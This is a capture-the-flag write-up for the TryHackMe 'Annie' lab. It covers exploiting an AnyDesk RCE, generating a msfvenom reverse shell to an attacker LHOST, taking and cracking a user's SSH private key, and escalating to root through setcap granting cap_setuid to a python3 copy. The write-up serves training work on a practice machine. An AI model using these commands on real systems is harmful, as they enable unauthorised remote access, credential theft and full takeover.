TryHackMe

Writeups for the rooms available in TryHackMe

View on GitHub

https://tryhackme.com/room/annie

image

Difficulty : Medium

Initital Recon:

Started with the quick rustscan, found 3 open ports :

sudo rustscan -a 10.10.30.155 -- -sC -sV -T4 -vv -oN Annie_nmap
Open 10.10.30.155:22
Open 10.10.30.155:7070
Open 10.10.30.155:33017 ![image](https://user-images.githubusercontent.com/87700008/205996318-4065c13e-0675-48ef-85c8-c074b4befe3f.png) ![image](https://user-images.githubusercontent.com/87700008/205996442-54c654cf-20ec-488a-a3ba-215633d23693.png)

At the scan results I observed that there is AnyDesk client running on port 7070. By looking at this I got some hint that tthis might be the point of initial access.

Exploitation:

I quckly searched for google with the AnyDesk 7070 exploit & got the results : image

Since, I don’t have any version info I went with the first search result provied by exploit DB for version 5.5.2, ref : https://www.exploit-db.com/exploits/49613

This gave us the python exploit with Remote code execution : image

As per the exploit, we have to create our own shell code with msfvenom, so I created my own:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode

image

After many trial & error after many port lport change & many room reset, I finally received my connection on port 7070, on which AnyDesk is running.

image

I received the connection as user “Annie”:(pwn3d!🙂) image

Now, it’s time to upgrade & stablize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg (and press enter)

image

User.txt:

And, I got user flag into the home directory of the Annie itself. image

In the Annie’s folder I found a folder name “.ssh” where annie’s private key is saved in ‘id_rsa’, so I copied it to my machine & tried to SSH but failed as it’s asking for passphrase.

image

So, I quickly used a John the ripper module “ssh2john” to convert the id_rsa file into John the ripper format & tried to crack it. And in few seconds I was able to crack it as well. image

Priv Esc:

I started with manual enumeration, like checking sudo version, cron jobs, sudo permissions etc. But I found something unusual in SUID list that there is something called “/sbin/setcap”

find / -perm -4000 -type f 2>/dev/null

image

I quckly searched for “setcap priv esc” & landed onto this page : https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

As per the blog if have the permission of setting the capablities then we can change the capablities of python3(as expample) & get the root privleges.

image

So, for the Priv Esc I followed the blog & copied the python3 binary in /tmp folder:

cp /usr/bin/python3 /tmp

Then changed the capablities of that python3 file:

setcap cap_setuid+ep /tmp/python3

And run the Python3 to set my uid as 0 & execute bash shell:

./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

This gave me the root privleges:(pwn3d!🙂)

image

Root.txt

After successfull execution I got the root flag in root folder.

image